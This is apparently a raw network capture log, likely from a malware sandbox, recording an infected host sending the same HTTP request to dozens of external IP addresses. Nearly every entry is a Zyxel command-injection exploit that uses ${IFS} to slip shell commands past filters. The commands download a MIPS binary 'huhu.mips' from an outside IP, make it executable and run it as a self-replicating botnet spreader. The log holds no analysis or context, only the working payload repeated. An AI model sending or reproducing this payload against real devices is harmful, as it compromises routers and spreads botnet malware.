                                              Jan 29, 2024 07:03:36.744473934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1026192.168.2.1453840128.194.47.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744520903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1027192.168.2.143351698.190.161.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744553089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1028192.168.2.1450482165.54.203.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744605064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1029192.168.2.1452332166.23.233.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744632006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1030192.168.2.1454736201.55.85.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744688034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1031192.168.2.14559862.235.113.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744743109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1032192.168.2.1440380158.241.205.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744777918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1033192.168.2.146072648.190.45.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744818926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1034192.168.2.1458762100.200.35.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744868994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1035192.168.2.1449908178.88.31.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744901896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1036192.168.2.1458374128.138.39.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744939089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1037192.168.2.1438672196.122.252.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744987011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1038192.168.2.1447768131.71.183.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744999886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1039192.168.2.1449998179.109.193.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745047092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1040192.168.2.143603872.164.49.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745116949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1041192.168.2.144637861.113.225.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745155096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1042192.168.2.143931266.22.154.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745191097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1043192.168.2.1443098170.23.170.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745217085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1044192.168.2.1446148130.30.194.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745258093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1045192.168.2.1438086156.166.170.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745280027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1046192.168.2.1453382112.163.90.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745343924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1047192.168.2.1449090117.90.100.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745383978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1048192.168.2.1453164104.169.144.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745417118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1049192.168.2.144650027.69.211.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745455980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1050192.168.2.1433784104.212.69.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745486021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1051192.168.2.144086018.206.229.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745527029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1052192.168.2.1434422158.120.130.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745578051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1053192.168.2.1445836191.184.184.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745600939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1054192.168.2.145995252.90.249.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745651960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1055192.168.2.1449648207.10.118.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745671988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1056192.168.2.1437332175.161.132.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745702982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1057192.168.2.1436642152.18.176.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745767117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1058192.168.2.144409435.157.79.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745805979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1059192.168.2.1435600128.37.95.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745872021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1060192.168.2.145383831.42.140.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745903969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1061192.168.2.1446232132.107.135.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745937109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1062192.168.2.1451058120.146.214.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.745970964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1063192.168.2.144067087.137.165.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746018887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1064192.168.2.1444614100.172.87.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746067047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1065192.168.2.1460294194.10.197.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746104956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1066192.168.2.145825414.187.183.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746134043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1067192.168.2.1444704150.106.49.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746160984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1068192.168.2.145450871.2.231.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746190071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1069192.168.2.1447426182.189.51.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746228933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1070192.168.2.1444456206.3.174.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746270895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1071192.168.2.1453258103.123.247.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746305943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1072192.168.2.1434128128.227.148.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746347904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1073192.168.2.1443620190.141.212.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746395111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1074192.168.2.145597484.179.190.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746437073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1075192.168.2.143348049.26.134.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746464014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1076192.168.2.145064082.208.235.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746505976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1077192.168.2.1456086132.90.54.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746551991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1078192.168.2.1456318107.92.12.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746584892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1079192.168.2.1453140141.119.222.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746613026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1080192.168.2.143616880.104.20.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746675968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1081192.168.2.1457872156.122.222.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746701002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1082192.168.2.1433612131.51.248.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746740103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1083192.168.2.1452604163.65.201.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746787071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1084192.168.2.145976265.176.139.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746825933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1085192.168.2.1449134163.226.82.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746864080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1086192.168.2.145783670.223.140.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746907949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1087192.168.2.1432970106.171.114.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746941090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1088192.168.2.145490018.62.76.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.746965885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1089192.168.2.1439886199.101.208.78443
                                              TimestampBytes transferredDirectionData
